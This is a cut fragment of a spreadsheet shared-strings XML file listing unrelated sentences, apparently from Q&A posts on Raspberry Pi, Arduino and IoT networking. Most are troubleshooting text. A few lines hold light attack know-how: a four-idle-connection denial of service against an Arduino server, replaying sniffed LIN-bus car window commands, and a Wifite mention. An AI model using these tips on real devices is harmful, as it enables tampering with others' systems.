    <t>For example, it takes more than 20 seconds until the first screen where the user introduces the email address is showed.</t>
  </si>
  <si>
    <t>Firewall is disabled on the PC and the IP/Port addresses for the Pi are correct.</t>
  </si>
  <si>
    <t>Trying to setup a wifi hotspot (that doesn't require internet) on the RPi Zero W via SSH.</t>
  </si>
  <si>
    <t>The Android application simply asks to the user if he wants to pair with the Raspberry, without pin confirmation.</t>
  </si>
  <si>
    <t>Ethernet connection works flawlessly, but as I attempt to connect to WiFi using ADB as mentioned here, nothing happens.</t>
  </si>
  <si>
    <t>By now, the server is "echoing" the information received to acknowledge it, but I believe that shouldn't be necessary, in fact, it may be inefficient.</t>
  </si>
  <si>
    <t>One scenario I can't catch though is when I disconnect my SSH session by closing my SSH client.</t>
  </si>
  <si>
    <t>I originally asked a question on if the AWS IoT Python SDK needed a root CA because my attempt to connect would timeout without error.</t>
  </si>
  <si>
    <t>After adding the root CA piece, now I'm getting a Websocket Handshake Error.</t>
  </si>
  <si>
    <t>So far I've tried creating a new Profile for the Ethernet connection but without success.</t>
  </si>
  <si>
    <t>I set permissions to Arduino IDE to check if serialport is OK (and now its working), but the application I wrote could not get any data from this port, how can I set permissions to this specific application?</t>
  </si>
  <si>
    <t>I am trying to setup AWS IoT using a Python script as mentioned in this link:
I am able to connect on AWS IoT MQTT without WebSocket (used x.509 certificate).</t>
  </si>
  <si>
    <t>I'm trying to establish a connection to an mqtt broker, but I have to set ssid and password that are not const char because they are setted by a web page.</t>
  </si>
  <si>
    <t>Either that or is there a way to attempt to get access to the wifi on boot independent of the program?</t>
  </si>
  <si>
    <t>My question is how do I verify receipt of the data packet at the remote device?</t>
  </si>
  <si>
    <t>Are the static IP/Subnet mask creating issues?</t>
  </si>
  <si>
    <t>I have two codes: one for the client (the one who sends the image) and one for the server (the one who receives the image).</t>
  </si>
  <si>
    <t>No jailbreaking, no BT programming, no serial com port stuff.</t>
  </si>
  <si>
    <t>It supports FTDI and CDC-ACM usb serial devices using Android's USB host support; no root or ADK necessary.</t>
  </si>
  <si>
    <t>2) Implement two way communication so your device sends confirmation message (i.e.</t>
  </si>
  <si>
    <t>A TCP connection requires more packets to provide the reliable transport of the data.</t>
  </si>
  <si>
    <t>This way you can keep a 1-to-1 identification of a GCM id and a public IP address to know to which Arduino device to send the signal.</t>
  </si>
  <si>
    <t>Second, these modules are by default configured to acquire IP address from AP using AP's DHCP pool.</t>
  </si>
  <si>
    <t>Your next task is how to have this trusted output sent to the printer.</t>
  </si>
  <si>
    <t>wifi-direct can only make connections to the access point.</t>
  </si>
  <si>
    <t>Besides the other answers (Selcuk's answer seems better), you could protect your statement with an exception:</t>
  </si>
  <si>
    <t>That will allow you to send email with less secure login process.</t>
  </si>
  <si>
    <t>If your wifi0 device is the internet connection then your default gateway will be the IP address of the AP you're connected to.</t>
  </si>
  <si>
    <t>A probable cause is is either a closed port or a proxy server not letting the programs request through.</t>
  </si>
  <si>
    <t>If that didn't help, try manually closing/unexporting the pin as root and then re-run the script.</t>
  </si>
  <si>
    <t>Usually readers have Ethernet port but does not support wifi by their own.</t>
  </si>
  <si>
    <t>Since your TCP connection is working, I bet that the port 10000 on your ubuntu is blocked by the firewall.</t>
  </si>
  <si>
    <t>returns +CREG: 0,1 or +CREG: 0,5 which signifies a valid network registration.</t>
  </si>
  <si>
    <t>A simple example can be 10 switches where each switch represent 1 so our password has to be between 0 to 10.</t>
  </si>
  <si>
    <t>If you create a network with two XBee modules (A and B), you can have a computer wired to XBee A send a "Remote AT Request" (in API mode) to XBee B to change the I/O pin wirelessly.</t>
  </si>
  <si>
    <t>Only one unique connection is allowed per clientID; you can not have two concurrent connections using the same ID.</t>
  </si>
  <si>
    <t>The address is stored in the IC, therefore you have communicate and extract the address.</t>
  </si>
  <si>
    <t>After the connection is  recovered, message in the waiting list will be sent.</t>
  </si>
  <si>
    <t>The user will get an captive page to configure his wifi connection.</t>
  </si>
  <si>
    <t>These option requests simply need to be acknowledged as suggested by JimmyB.</t>
  </si>
  <si>
    <t>I've just spent a week beating on this problem so I can refrain from sending SMS home alarms to my wife when she's at work.</t>
  </si>
  <si>
    <t>It is not possible to access the RPI without a defined static IP address, therefore it is not possible to bind a ServerSocket to any IP address.</t>
  </si>
  <si>
    <t>I used the IP address and the netmask given in  and the gateway from route -n.
I added to the interfaces file:
auto eth0
address 169.254.255.193
netmask 255.255.0.0
gateway 0.0.0.0
with just a difference in the address for both pis.</t>
  </si>
  <si>
    <t>This will not invalidate the session credentials already provided by Cognito which were used to establish the connection.</t>
  </si>
  <si>
    <t>The port 443 is not reachable even at a basic TCP level.</t>
  </si>
  <si>
    <t>From there you can setup a rule to expose this app/port to the outside world.</t>
  </si>
  <si>
    <t>In particular is necessary to pass MQTT_APIKEY and USERNAME to establish connection with mqtt broker, even with PUBLIC channel.</t>
  </si>
  <si>
    <t>NAT rewrites the IP addresses of some of the packets in order to hide the network that's being NATed.</t>
  </si>
  <si>
    <t>It will only be able to proxy TCP packets to port 80 - it won't be able to proxy name server requests or any other protocols.</t>
  </si>
  <si>
    <t>You need to release after giving enough delay so that you send only one key press to the application.</t>
  </si>
  <si>
    <t>Plus, you only need to update ~/.ssh/config if the username or host changes (or you want to add another user@host combination).</t>
  </si>
  <si>
    <t>BLE obtain uuid encoded in advertising packet
Here is his code snipet:</t>
  </si>
  <si>
    <t>If you need to receive all messages just simply set mask to 0x00.</t>
  </si>
  <si>
    <t>After net service is discovered with , you'll have IP address and port of your Pi available on your iPhone, so you can connect to it.</t>
  </si>
  <si>
    <t>Dwolla allows anyone connected to the Internet to safely send and receive money.</t>
  </si>
  <si>
    <t>A sniffer is a product that analyzes code or network data packets.</t>
  </si>
  <si>
    <t>Once a channel is closed, any
  attempt to invoke an I/O operation upon it will cause a
  ClosedChannelException to be thrown.</t>
  </si>
  <si>
    <t>The serial line is used by gdb to communicate with the kernel being debugged.</t>
  </si>
  <si>
    <t>The bitwise AND operation between mask and IP address results the address of the network itself, and the remainder identifies the computer LAN connector within that network.</t>
  </si>
  <si>
    <t>This rules are actually set on different ports(port no 1024-65535) of the Network Security Group.</t>
  </si>
  <si>
    <t>Unencrypted connections use the "ws://" URL scheme and default to port 80.</t>
  </si>
  <si>
    <t>It also generates and sends reports of abuse via email and syslog facilities.</t>
  </si>
  <si>
    <t>In ADFS, identity federation is established between two organizations by establishing trust between two security realms.</t>
  </si>
  <si>
    <t>The browser only matches on domain name, not on IP addresses or other forms of server identity.</t>
  </si>
  <si>
    <t>If acting as a server, it is very easy to cause a denial of service: just open 4 connections to the Arduino without sending any data.</t>
  </si>
  <si>
    <t>Cant autodetect firmware, because proper answer not received (may be unknown firmware).</t>
  </si>
  <si>
    <t>I am working on serial communication between two MCU's particularly teensy(similar to Arduino) for generating fake GPS data.</t>
  </si>
  <si>
    <t>I can't verify it, my input signals start at port 23.
example:
Now I installed the AllInputsFirmata on my Mega, it is also preinstalled in Arduino 1.0.</t>
  </si>
  <si>
    <t>skype control software included on CD) that works with this particular USB phone and then use USB sniffer to analyze packets / protocol.</t>
  </si>
  <si>
    <t>A contact's details are data such as phone numbers and email addresses.</t>
  </si>
  <si>
    <t>FORTIFY_SOURCE is a GCC and GLIBC security feature that attempts to detect certain classes of buffer overflows.</t>
  </si>
  <si>
    <t>dynamic port forwarding)
verify requests have been sent (i.e.</t>
  </si>
  <si>
    <t>Therefore I use this rule: 
What I want is to make an exclusion for specific users, therefore I want to stop certain ip addresses from being forwarded.</t>
  </si>
  <si>
    <t>It should be spinning the servo when the correct password is inputed but the pi dies before I can even get onto the site that's being hosted.</t>
  </si>
  <si>
    <t>Serial communications usually employ many forms of validation such as packet checking.</t>
  </si>
  <si>
    <t>I know that the data channels are opened when a video call is initiated and I've tried the test in this link to see if I can indeed send keycodes to the pi (and I can).</t>
  </si>
  <si>
    <t>Safety checks, such as array index range checks, null checks, and so on, are intended to catch programming errors.</t>
  </si>
  <si>
    <t>The long answer will be that you can't do that because you will have a problem with port 443 will enabling it on the firewall and you will suffer with it more, but you may same how find a solution here
or here I hope so.</t>
  </si>
  <si>
    <t>Basically the main objective of this question is knowing how to stop the buzzer action once the door sensor is opened (LOW).</t>
  </si>
  <si>
    <t>You should either read every message until you get the one with the CAN ID you expect (probably CAN ID 0x7e8) or set an appropriate filter/mask in the MCP chip, so it will only send you relevant messages.</t>
  </si>
  <si>
    <t>You could scan for devices on your network (if your school allows it)
Assuming you have a standard school network you could use following Linux command
To scan all the devices on the network and see if you can spot your Orange PI
See https://www.cyberciti.biz/security/nmap-command-examples-tutorials/</t>
  </si>
  <si>
    <t>You can find an example of that here
I suspect somewhere the HTML is getting corrupted in your code since you're pasting it in, and something somewhere doesn't get escaped properly, leading the browser to drop an element.</t>
  </si>
  <si>
    <t>The Internet Systems Consortium DHCP Client, dhclient, provides a means for configuring one or more network interfaces using the Dynamic Host Configuration Protocol, BOOTP protocol, or if these protocols fail, by statically assigning an address.</t>
  </si>
  <si>
    <t>To simplify the issue, here are the commands that fail:
mkdir -p /tmp/nfs
mkdir -p /tmp/nfs/Orico1
mount -t cifs //192.168.1.96/Moviez /tmp/nfs/Orico1 -o ro,domain=Servalan,username=cavalli,password=sambapw
It yields the error message:
mount: Mounting //192.168.1.96/Moviez on /tmp/nfs/Orico1 failed: Permission denied
Pinging 192.168.1.96 works:
ping 192.168.1.96
192.168.1.96 is alive!</t>
  </si>
  <si>
    <t>The closest SO question I can find is How to receive sms messages on raspberry pi where the incomplete answer was "You'd have to expose the RasPi to the public internet".</t>
  </si>
  <si>
    <t>Either declare it external to the loop or else declare it where you do but make it static (in either case you also have to deal with the initial invalid reading that it contains)</t>
  </si>
  <si>
    <t>As the common name of the certificate is the local IP (created by the change-ip.sh script), and when the hostname is found from the /etc/hosts file which is having the same IP, will result in host name verification failure.</t>
  </si>
  <si>
    <t>Attributes can describe:
the user
the resource or object being accessed / requested
the action being attempted (view, delete, approve...)
contextual data such as the time of the day, the user's IP, the authentication method...
xacml is an example of a standard which implements ABAC.</t>
  </si>
  <si>
    <t>Additional info 
1.- Doing something like curl localhost:9000 gives ( note that doing the same with IP address it does not fail )
2.- This is my etc/hosts
3.- Running netstat -lnp
 netstat -lnp
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)</t>
  </si>
  <si>
    <t>You need to program a php script in a psp it can done without hacking it 
you can also use the source code provided  down 
A simple PHP script using the PHPSerial class to
send messages over the serial connection to the arduino from a PSP
from the image map.</t>
  </si>
  <si>
    <t>In addition to the extra chunk added, other modifications cause the generated images to be invalid as per the current version of the PNG standard:
extra critical chunk (CgBI)
byteswapped (RGBA -&gt; BGRA) pixel data, presumably for high-speed direct blitting to the framebuffer
zlib header, footer, and CRC removed from the IDAT chunk
premultiplied alpha (color' = color * alpha / 255) 
Source: iPhoneDevWiki</t>
  </si>
  <si>
    <t>I have been working on an Arduino project and ha ve come ascross this problem in verification : exit status 1
expected primary-expression before 'if'
I have searched for solutions all over the web but the only solutions are making sure to define things properly but as far as I am aware they are fine...
My code is :
Help?</t>
  </si>
  <si>
    <t>Operators can configure the Gateway to do "anything" when an incoming API call is received, including dynamic routing, data transformation, security mediation (authentication or authorization), rate limiting or quota enforcement, caching, response data masking, response data augmentation, and more.</t>
  </si>
  <si>
    <t>Link-Local addresses (Link-Local scope) are designed to be used for addressing on a single link for purposes such as automatic address configuration, neighbor discovery or when no routers are present.</t>
  </si>
  <si>
    <t>SSH was designed as a replacement for Telnet and other insecure remote shell protocols such as the Berkeley rsh and rexec protocols, which send information, notably passwords, in plaintext, rendering them susceptible to interception and disclosure using packet analysis.</t>
  </si>
  <si>
    <t>This is distinct from email validation, which is concerned simply with determining whether a given string is a valid email address (leaving aside the problem of whether it exists, or who owns it).</t>
  </si>
  <si>
    <t>To the best of my ability I'm attempting to ensure the root partitions on the SD &amp; SSD are as close as possible to being identical, again for recovery purposes in case of SSD failure.</t>
  </si>
  <si>
    <t>I expect the Pi's are tested in the factory using JTAG but the BCM chips may well have security fuses which are blown at the end of the production process once Serial Numbers have been programmed.</t>
  </si>
  <si>
    <t>I want to install Open JDK 8 on my Rarpberry PI 3 running Ubuntu MATE 16.04
I've an internet connection using corporate Proxy that requires a certificate for HTTPS connection.</t>
  </si>
  <si>
    <t>By periodically POSTing data to the nest web servers using HTTPS, Nest is able to avoid having the user open any ports on their router.</t>
  </si>
  <si>
    <t>Single-user mode is when you add "single" to cmdline, or otherwise boot or transition into runlevel 1 or S. You have almost no background daemons started, and only root may login, on console.</t>
  </si>
  <si>
    <t>Therefore I added --timeout=10 to try to cleanly shutdown the rsync process if there is no IO detected, but that doesn't seem to work as I can see rsync continuing to run as a process well after pulling an SD card.</t>
  </si>
  <si>
    <t>The HTTP Server API includes SSL support so that applications can exchange data over secure HTTP connections and is also designed to work with I/O completion ports.</t>
  </si>
  <si>
    <t>In situations where the client is behind a firewall and unable to accept incoming TCP connections, passive mode may be used.</t>
  </si>
  <si>
    <t>Reviewing suggested edits
In addition, users with this privilege level also get access to the suggested edits queue.</t>
  </si>
  <si>
    <t>Cam Chat HD
[3.350192] usb 1-1.3: Manufacturer: Creative Technology Ltd.
[3.357531] usb 1-1.3: SerialNumber: 2G130236
[3.949616] udevd[154]: starting version 175
[5.197753] Registered led device: led0
[5.294970] Linux media interface: v0.10
[5.499646] Linux video capture interface: v2.00
[6.009958] uvcvideo: Found UVC 1.00 device VF0700 Live!</t>
  </si>
  <si>
    <t>is it possible to let a web server, for example my Raspberry Pi, start a Script when a specific QR-Code gets scanned from my Mobile Device connected to my Home-Network?</t>
  </si>
  <si>
    <t>void GetEditPassword(int password_data[],int size)
{
    lcd.setCursor(0,0);
    lcd.write("ENTER PASSWORD  ");
    lcd.setCursor(0,1);
    lcd.print(password_data[0]);
    lcd.print(password_data[1]);
    lcd.print(password_data[2]);
    lcd.print(password_data[3]);
    lcd.print("              ");
}
Here i have doubt i am setting cursor 0,0 and 0,1 .</t>
  </si>
  <si>
    <t>When starting the minion service (service minion start), I get the error message below from  systemctl status minion.service: 
LIBRENMS01 minion[22076]: Starting minion (via systemctl): minion.serviceFailed to start minion.service: Interactive authentication required.</t>
  </si>
  <si>
    <t>Here are the steps you need to do to connect your raspberry pi to Azure IOT hub using python
1) Setup your PI
For setup , you can use this link to enable SSH on your pi.</t>
  </si>
  <si>
    <t>#/usr/bin/python
from Crypto.PublicKey import RSA
from Crypto import Random
hwrngFile = open('/dev/hwrng', 'r')
randomStream = hwrngFile.read(512)
hwrngFile.close()
key = RSA.generate(4096, randomStream)
print key</t>
  </si>
  <si>
    <t>However, the script is not started and in my error.log I'm getting 
: cannot connect to X server 
I'm getting the same output when I want to start the script via SSH using Putty.</t>
  </si>
  <si>
    <t>Not sure if you got this working, but from what I have read you can not access the iPhone's serial port for communication while your app is in the sandbox.</t>
  </si>
  <si>
    <t>The UNO has leds on both TX and RX lines, so you can easily verify if anything is transmitted, if you are using the "real" serial port.</t>
  </si>
  <si>
    <t>Here is a way to setup an FTP server just keep in mind that it will require additional ports allowed through firewall 21 for the FTP control channel and a few other depending on configuration for passive mode.</t>
  </si>
  <si>
    <t>First you need to know the VID and PID of your dongle, one way to find out is plug it to you PC, and check out in the Device Manager, 
Then plug your dongle to the Pi, and connect to Pi with SSH or PowerShell,
Use "devcon status XXXXXX" to query the driver status.</t>
  </si>
  <si>
    <t>If that's the case, I check for a placed mobile phone by authenticating AID via inDataExchange() and do only check for mifareclassic via readPassiveTargetID() if that didn't work.</t>
  </si>
  <si>
    <t>So I added an additional gc.login() into the main loop with a counter to trigger it every 45 minutes.</t>
  </si>
  <si>
    <t>One Arduino has an IR decoder which decodes the key from a hand held remote, and sends it to the other Arduino parked in front of the box with an IR emitter.</t>
  </si>
  <si>
    <t>Is there a 'fail safe' time-out code to send the command again if serialEvent3 is not triggered?</t>
  </si>
  <si>
    <t>The Ethernet global object's IP address stays the same, even after the cable is unplugged.</t>
  </si>
  <si>
    <t>The code used ( in AVRDude 5_11_0 sources):
Right after receiving from the socket file descriptor is checked to be valid (and I believe it is):
if (!</t>
  </si>
  <si>
    <t>Can anyone help me figure out what parameter I need to set up or how to unlock arduino for byte receiving ?</t>
  </si>
  <si>
    <t>Step #3 Third party server sends a notification to the device that it should download the ABC shop's app
OR
Raspberry PI or iBeacon identifies the device proximity and sends the same notification directly to the iPhone device without contacting the third party server.</t>
  </si>
  <si>
    <t>I set the pi up to allow port 23 as port 22 is already being used by my computer when i want to ssh into it from another location.</t>
  </si>
  <si>
    <t>For a little reference, the code is sending a message to a couple Arduinos so they can be identified by their MAC addresses.</t>
  </si>
  <si>
    <t>There are some sensor values which should be logged, but unfortunately my processing code rewrites the file after each cycle so that I get the last sensor value only.</t>
  </si>
  <si>
    <t>I've given both devices a static IP address and hardcoded the IP addresses on both machine for now.</t>
  </si>
  <si>
    <t>Though I have selected .appx bundle, certificate and dependencies I am getting 
Failed to commit pending deployment
error.</t>
  </si>
  <si>
    <t>I tried to put public IP address of my modem instead of 192.168.4.1(which is default for ESP8266) it didn't work.</t>
  </si>
  <si>
    <t>receiver collects two bytes, compute CRC4 and if it matches frame is considered valid.</t>
  </si>
  <si>
    <t>I'm using node.js for that with a sample code like that:
This is however not working at all after i disable the login shell over serial port serial port in raspi-config.</t>
  </si>
  <si>
    <t>And how to send other parameters like 'client_id', 'username', 'password', 'authentication token' along with the HOST ?</t>
  </si>
  <si>
    <t>so my question is, can we identify the pin connection before running the script?</t>
  </si>
  <si>
    <t>The connections are not spamming (no cause to be a DOS candidate), yet it seems the connection is being filtered before hitting the sites.</t>
  </si>
  <si>
    <t>An example of the final result I would like to achieve is (in the form of a conversation between me and the bot):  
Me: pwd
Bot: /home/user/some/directory
Me: sudo chmod 777 file.txt
Bot: [sudo] password for user:
Me: qwerty
Me: ssh user@host
Bot: user@hosts password:
Me: qwerty2
Bot: Welcome to host...
or
Me: cat
Me: hello
Bot: hello
Me: test
Bot: test
Me: Ctrl+D
P.S.</t>
  </si>
  <si>
    <t>The project requires that up to 10 nodes be assigned IP addresses from a DHCP server.</t>
  </si>
  <si>
    <t>I'm trying to install node modules on my raspberry pi 2, but it always through me an error 'EHOSTUNREACH 151.101.60.162:443'
For example, with a , the complete error is:
I'm connected to my raspberry pi through ssh and i've put it a fixed ip address on it.</t>
  </si>
  <si>
    <t>I want to test the connection using my Raspberry Pi but I always get this error:
I have already setup the firewall and want to access the database.</t>
  </si>
  <si>
    <t>One shield is connected to a computer and the other to a router or other internet connection.</t>
  </si>
  <si>
    <t>I have a webpage that will dynamically send a random password to my email account.</t>
  </si>
  <si>
    <t>The codes work if executed in a loop, though the first execution outputs illegal characters</t>
  </si>
  <si>
    <t>I'm trying to create an Android app that can send a confirmation message, over WiFi to my raspberry pi3 connected to the same WiFi network.</t>
  </si>
  <si>
    <t>I have read in this that in C it must be safe (based on the answers) 
And I was wondering if it is safe in C++ to do the same (based on answers in this, it should be).</t>
  </si>
  <si>
    <t>If I want users to register their device, I assume that I have to give each device UUID and let the user enter that UUID.</t>
  </si>
  <si>
    <t>In theory I plan to set the pi as Access Point and hardcode in the sensors the SSID of the Pi and have a portable system.</t>
  </si>
  <si>
    <t>I can connect my arduino to the field agent but whenever it sends data I get a 0x02 exception code - Illegal data address.</t>
  </si>
  <si>
    <t>I am looking into IoT development and wanted to set up my own repo without uploading the SSID and password of my personal WiFi.</t>
  </si>
  <si>
    <t>I used "Wifite" command but it only shows the mac addresses of access points and not of the non connected mobile device.</t>
  </si>
  <si>
    <t>For some reason when I use WiFi.begin(ssid, password); in any sketch I'm unable to upload code to the esp32, I get the same error shown above.</t>
  </si>
  <si>
    <t>I am trying to send information from a sensor, where I have made an encryption of the information using the AES algorithm.</t>
  </si>
  <si>
    <t>by one knock ,enter_password() starting .after finish go to standby mode and wait for new knock to run again enter_password() .</t>
  </si>
  <si>
    <t>by one knock must run enter_password() And get the password from the user by 5 loop .every one loop give 1 or 2 or ...or 9 knock .</t>
  </si>
  <si>
    <t>only allow connections from devices that present my custom CA certificate (and not AWS IoT build in certs) upon connection initiation.</t>
  </si>
  <si>
    <t>If I run:
it runs, but obviously program fail because relays can't open raw sockets without sudo permission.</t>
  </si>
  <si>
    <t>The network address you show is a "private" address, allocated by your router.</t>
  </si>
  <si>
    <t>I think anything successful would have to exploit a pattern in the kind of images you are sending to the pixels.</t>
  </si>
  <si>
    <t>Once the float variable is corrupt, Serial.print() will just show zero.</t>
  </si>
  <si>
    <t>You really should set the Handshake property to Handshake.RequestToSend, the most common way a device implements it.</t>
  </si>
  <si>
    <t>You have a limited ability to detect if there is something listening on the other side by using the DSR/DTR pins.</t>
  </si>
  <si>
    <t>Edit to add:
4) disabling serial port login doesn't have to be permanent.</t>
  </si>
  <si>
    <t>However, whether you're using a serial connection or a ISP programmer, you'll want to add a udev rule so that user access to the device is allowed.</t>
  </si>
  <si>
    <t>Anyway, after the command is properly verified, I print a header that tells the browser this is a JSON object.</t>
  </si>
  <si>
    <t>You haven't shared any specific configuration details, though above code should let the email to be sent.</t>
  </si>
  <si>
    <t>Obviouly, you want also to make sure the firewall is accepting and not blocking TCP connections on port 8080.</t>
  </si>
  <si>
    <t>You should create a new user who can access to this database with the host 192.168.0.4 or %, because by default root can be used only from localhost.</t>
  </si>
  <si>
    <t>Then a condition to check if the password is used again,  
This way you can work within your main loop and never miss an incoming char.</t>
  </si>
  <si>
    <t>Also you can add multiple IP address to interface eth0 through
If you dont want IP address 192.168.1.18 you can remove it by
sudo ip addr del 192.168.1.18 dev eth0</t>
  </si>
  <si>
    <t>It is not possible to use the on-board serial device on the Raspberry Pi 2 for Universal Apps - it is reserved for lower-level debugging, like device drivers.</t>
  </si>
  <si>
    <t>All sensor data will be send over Bluetooth connection and will be collected by your phone app.</t>
  </si>
  <si>
    <t>Note that if you set an hard-coded IP address even in a DHCP range it will be working.</t>
  </si>
  <si>
    <t>You could send sensor values through the internet via an Ethernet shield like the ENC28J60 with the EtherCard library.</t>
  </si>
  <si>
    <t>If you are going for this solution you need to set up a DHCP-Server on your computer to give the raspberry an ip-address.</t>
  </si>
  <si>
    <t>Unfortunately you cannot flash the ESP-01 module from Serial interface since it has no GPIO15 exposed.</t>
  </si>
  <si>
    <t>I'd assume that most of the heavy lifting (copying SSID/passphrase to be sent to the devices) would be done by the application.</t>
  </si>
  <si>
    <t>"Got IP" means that one of the components of your network infrastructure (the DHCP server) was reachable and assigned an IP address to your device.</t>
  </si>
  <si>
    <t>Once it is sure that a button press is genuine (not a parasite), it will call the appropriate callback:
A concrete example of some callback could be indeed incrementing some global counter.</t>
  </si>
  <si>
    <t>It was a firewall problem because he stopped the entrance connection.I realized there when I reversed the roles.</t>
  </si>
  <si>
    <t>If you want to buffer some value every each XX seconds, place a routine where you verify sensors every each XX seconds and hold it on your rom (if really need).</t>
  </si>
  <si>
    <t>Unable to push data to the output sink for connectivity/authentication reasons.</t>
  </si>
  <si>
    <t>When it gets a "network/broadcast" with a payload of "discover" it replies by publishing a "network/presence" and its name.</t>
  </si>
  <si>
    <t>In short, unlike UNO the Mega doesn't have Pin Change Interrupt capability on all pins.</t>
  </si>
  <si>
    <t>Static IP allows 192.168.0.1 to be reserved to a device MAC address (another form of network identity) so it always pointing to the same device on future renewal.</t>
  </si>
  <si>
    <t>When it returns, the ESP8266 SDK gets to reset the watchdog timers.</t>
  </si>
  <si>
    <t>You'll probably be able to ssh into it with:
If not, look in your router's "DHCP clients" table or use nmap to get its IP address.</t>
  </si>
  <si>
    <t>Port numbers uniquely identify the service using the TCP connection.</t>
  </si>
  <si>
    <t>This fingerprint is in  (typically in C:\Users\&lt;User&gt;\Documents\Arduino\libraries\firebase-arduino-&lt;version&gt;\src\FirebaseHttpClient.h).</t>
  </si>
  <si>
    <t>Access address: 32 bits, advertising or data access addresses (it is 
used to identify the communication).</t>
  </si>
  <si>
    <t>As long this watchdog timer is enabled and is triggerd, task switches can happen any time.</t>
  </si>
  <si>
    <t>You need then to listen to the LIN Bus and detect the ID used when openining the window or closing it, once you detect the ID and the packet data, you can replay it.</t>
  </si>
  <si>
    <t>The 802.15.4 network is a simple star network and no implicit repeating of the broadcast is performed by any of the nodes on the network.</t>
  </si>
  <si>
    <t>A trap set to detect or deflect attempts to hack a site or system.</t>
  </si>
  <si>
    <t>jQuery.address is a plugin of jQuery that is used to create the unique virtual addresses.</t>
  </si>
  <si>
    <t>The unknown host message is common when a user tries to connect to a remote host.</t>
  </si>
  <si>
    <t>The IP address of a jail is usually an alias address for an existing network interface, but this is not strictly necessary.</t>
  </si>
  <si>
    <t>It stores data on the server side and abstracts the sending and receiving of cookies.</t>
  </si>
  <si>
    <t>A botnet's tasks can be as mundane as keeping control of an IRC channel, or it could be used to send spam email or participate in DDoS attacks.</t>
  </si>
  <si>
    <t>Some examples of this permissions are:
Email Permissions
Email is a protected property and must be specifically asked for and granted.</t>
  </si>
  <si>
    <t>A packet sniffer captures raw data traveling over a network segment and saves it to a file for analysis.</t>
  </si>
  <si>
    <t>DeviseInevitable adds support to Devise for sending invitations by email, accepting the invitation and setting the password.</t>
  </si>
  <si>
    <t>These variables serve as placeholders for application names, commonly accessed directory names, user names, passwords, host names, IP addresses, and more.</t>
  </si>
  <si>
    <t>To prevent port hijacking, all of the
              processes binding to the same address must have the same
              effective UID.</t>
  </si>
  <si>
    <t>To prevent port hijacking, all of the processes binding to the same address must have the same effective UID.</t>
  </si>
  <si>
    <t>Please note that your account will be limited to 100 API calls until you verify your email address.</t>
  </si>
  <si>
    <t>The pack also includes some unique components not found anywhere else such as Duplicate Detector and Data Anonymizer.</t>
  </si>
  <si>
    <t>Any harm or damages caused by any malicious programs hosted on the Guest OS, will be contained within thus not spreading to the Host OS.</t>
  </si>
  <si>
    <t>Runtime Environment -
   OS Version: Microsoft Windows NT 5.1.2600 Service Pack 3
  CLR Version: 2.0.50727.3603
Scenario: 1.user_logs_in_successfully
Given I am not logged in - PENDING
When I log in as Morgan with a password SecretPassw0rd - PENDING
Then I should see a message, "Welcome, Morgan!"</t>
  </si>
  <si>
    <t>A secure connection is critical to begin accepting payments.</t>
  </si>
  <si>
    <t>It allows the user to intercept and display TCP/IP and other packets being transmitted or received over a network to which the computer is attached.</t>
  </si>
  <si>
    <t>When connecting a Windows/Mac laptop to the same port, it is possible to "cancel" or not init a certificate authentication, in which case the enterprise can choose to connect the device to an "open" network.</t>
  </si>
  <si>
    <t>I want to use a 1-wire DS2408 to identify the node by its factory set unique id and have its 8 IOs for different lights.</t>
  </si>
  <si>
    <t>Any algorithm to convert this fingerprint template into feature vector or match each other.</t>
  </si>
  <si>
    <t>The error message that I'm getting in the game screen is "Nuilnitialize Failed - Device is not genuine.".</t>
  </si>
  <si>
    <t>As we understand it if the server times out but the device successfully responds (getting an MQTT PUBACK from the IoT-Hub), then we have an inconsistency where the device is "unlocked" but the server think it failed.</t>
  </si>
  <si>
    <t>When you have the Arduino IDE/Monitor open it uses the com port and other programs are denied access.</t>
  </si>
  <si>
    <t>If the user has not entered any data, then any read operations wait for user input and become blocked.</t>
  </si>
  <si>
    <t>Rather than disabling the watchdog timer, try to make sure that you don't stay in  for too long.</t>
  </si>
  <si>
    <t>I found my error by looking at /var/log/syslog
Turned out that I had my encrypted wpa_passphrase between parentheses "" and this stopped wpa_supplicant from doing its magic.</t>
  </si>
  <si>
    <t>This is because the ESP8266 can't find a WiFi access point with SSID  and password client-password.</t>
  </si>
  <si>
    <t>//////////////////////
int unlocker ()
{
    wdt_reset();
    // Check the pin states.</t>
  </si>
  <si>
    <t>I installed the required drivers and everything seems to work, but cannot find the SSID to be scannable by any of my devices.</t>
  </si>
  <si>
    <t>We're considering AWS IoT for an upcoming project featuring devices with unreliable network connections.</t>
  </si>
  <si>
    <t>Any method to get the character file (feature vector) from the fingerprint sensor ?</t>
  </si>
  <si>
    <t>I checked that with candump -n. 
The messages I receive on the Smartphone are ASCII coded.</t>
  </si>
  <si>
    <t>Is it possible(or easy) to hack those devices only from that open port?</t>
  </si>
  <si>
    <t>I haven't touched it in months and wanted to go back and check the Permissions on the Shared Access Key that my device is connecting with.</t>
  </si>
  <si>
    <t>However, when I serach the fingerprints the sensor always returns that the user does not exist.</t>
  </si>
  <si>
    <t>I have got just the home-button from an iPhone 5s and I thought about that I could use the sensor with a Raspberry PI or Arduino to scan fingerprints &amp; more.</t>
  </si>
  <si>
    <t>I am using Arduino for interfacing with fingerprint module.</t>
  </si>
  <si>
    <t>Next, you need to find out your public IP address on the WAN side.</t>
  </si>
  <si>
    <t>The result is the exact opposite of the bit-mask we used before.</t>
  </si>
  <si>
    <t>Start address is encoded in two bytes (0, 22).</t>
  </si>
  <si>
    <t>We found the problem why we were not able to provide wifi details.</t>
  </si>
  <si>
    <t>Please check the port is not block, you may need to confirm with the IT department if you were working in the environment of organization.</t>
  </si>
  <si>
    <t>When a request is received against a resource, Amazon S3 checks the corresponding ACL to verify the requester has the necessary access permissions.</t>
  </si>
  <si>
    <t>The file name starts with a dot, because most Unix-like operating systems consider any file that begins with dot to be hidden.</t>
  </si>
  <si>
    <t>Failed login attempts determined by IP and by username.</t>
  </si>
  <si>
    <t>The code for Color Identification is ready in OpenCV, what I do not know is how to transfer this data to my Arduino UNO board connected by USB.</t>
  </si>
  <si>
    <t>Is there any way in python to check whether the device is connected to access point?</t>
  </si>
  <si>
    <t>I'm not sure whether I can send a parameter that can be monitored or whether there's another better way.</t>
  </si>
  <si>
    <t>It works, but Galileo does not start ssh, since I cannot connect anymore if it's running + sometimes the arduino sketch is not running.</t>
  </si>
  <si>
    <t>I am trying to scan my network for connected mac addresses and found that  could do the trick.</t>
  </si>
  <si>
    <t>The BLE funtion however is the only one starting a ssh connection.</t>
  </si>
  <si>
